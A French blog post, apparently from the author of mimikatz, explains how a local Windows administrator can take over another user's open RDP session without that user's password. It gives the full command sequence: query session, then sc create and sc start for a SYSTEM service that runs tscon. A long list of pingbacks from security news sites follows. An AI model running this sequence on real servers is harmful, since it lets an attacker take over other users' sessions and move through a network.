Quand le système à tous les droits, rien ne vas plus…
Vous êtes administrateur d’un serveur (ou vous en avez les droits ;)) et aimeriez récupérer une session RDP déjà ouverte, mal fermé, ou simplement aller voir pourquoi Paintbrush est ouvert sur un serveur ?
Plusieurs options nous sont ouvertes :
-
Se connecter en RDP sur le serveur et récupérer la session à l’écran d’accueil :
mais il faudra connaître le mot de passe de session pour continuer…
-
Se connecter en RDP avec son compte administrateur (puis tenter une connexion par le gestionnaire de tâches par exemple)
mais il faudra connaître le mot de passe de session pour continuer… (idem via
tscon
ou le gestionnaire des services Bureau à distance) -
L’assistance à distance : par défaut, ce n’est pas automatique
il fallait régler ces options avant, et elles n’agiront pas sur les sessions courantes :(
Demandons un coup de main au système ?
Le système est notre ami
- Récupérons les identifiants de sessions concernés :
query session
C:\Windows\system32>query session SESSION UTILISATEUR ID ÉTAT TYPE PÉRIPHÉRIQUE services 0 Déco console 1 Conn >rdp-tcp#1 user1 2 Actif rdpwd rdp-tcp#0 gentilkiwi 3 Actif rdpwd rdp-tcp 65536 Écouter
rdp-tcp#0
est la session que nous voulons voler,rdp-tcp#1
est notre session ouverte. - Créons rapidement un faux service (qui fera l’affaire) :
sc create givemerdp binpath= "cmd /k tscon rdp-tcp#0 /dest:rdp-tcp#1" type= own
- En le démarrant, le bureau basculera :)
sc start givemerdp
Il peut être supprimé par :
sc delete givemerdp
Cela peut bien sur être plus propre avec PsExec… (et son argument -s
)
Tests que je vous invite à effectuer :
- Travailler avec des sessions RDP sources inactives ou dont la session Windows n’est pas fermée
- Travailler avec des sessions RDP cibles pas encore connectés !
- Utiliser PsExec depuis une invite externe (sans RDP)
Ping : Feature or flaw? How to hijack a Windows account in less than a minute - InfoSecHotSpot
Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password – AnonymousMedia
Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password | NuclearCoffee
Ping : Local Windows Admins Can Hijack Sessions Without Credentials | Threatpost | The first stop for security news
Ping : Session Hijacking All Windows versions – Tfun
Ping : Local Windows Admins Can Hijack Sessions Without Credentials - InfoSecHotSpot
Ping : Fonction ou faille ? Comment pirater un compte Windows en moins d'une minute - EXTEIN
Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password | CyberInject
Ping : Local Windows Admins Can Hijack Sessions Without Credentials - Help-Software
Ping : Hacker Cracks Home windows Account In under 1 Minutes, Doesn’t Understand If It is A Pester Or Function | ATechpoint
Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password - 95CN Security
Ping : Windows : une (presque) faille de vol de session RDP
Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password - Security Leaks
Ping : Local Windows Admins Can Hijack Sessions Without Credentials - Cyenet Solutions
Ping : Un hacker demuestra lo fácil que es secuestrar una cuenta de Windows | NoticiasDeHacking
Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password - Digital Myth Solutions
Ping : Hacker News: Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password | 1EarthUnited
Ping : Un vieux piratage de session Windows remis au goût du jour - EXTEIN
Ping : Cómo acceder a sesiones de usuarios en Windows sin contraseñas - NeoTeo
Ping : Cómo acceder a sesiones de usuarios en Windows sin contraseñas
Ping : Faille dans Windows: S'introduire dans une session utilisateur sans outils d'attaque | Tech221.net
Ping : Hacker Cracks Windows Account In Less Than 60 Seconds. By-ANKIT SINGH – <HACKER'S BLOG>
Ping : Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password | 95CN Security
Ping : 一种会话劫持技术通杀全部Windows版本,但这真的是漏洞吗… - FreeBuf.COM | 关注黑客与极客
Ping : 一种会话劫持技术通杀全部Windows版本,但这真的是漏洞吗… - 莹莹之色
Ping : Session Hijacking without Password on All Windows Versions - The Hackr
Ping : Hacker Cracks Windows Account In Less Than 60 Seconds! - Techie Idiots
Ping : RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation – Hackr Tech
Ping : MOV AX, BX Code depilation salon: Articles, Code samples, Processor code documentation, Low-level programming, Working with debuggers RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation
Ping : Hacker revela la forma más fácil de secuestrar una sesión de usuario de Windows privilegiada sin contraseña
Ping : Un pirate pirate un compte Windows en moins de 60 secondes ! - Fkool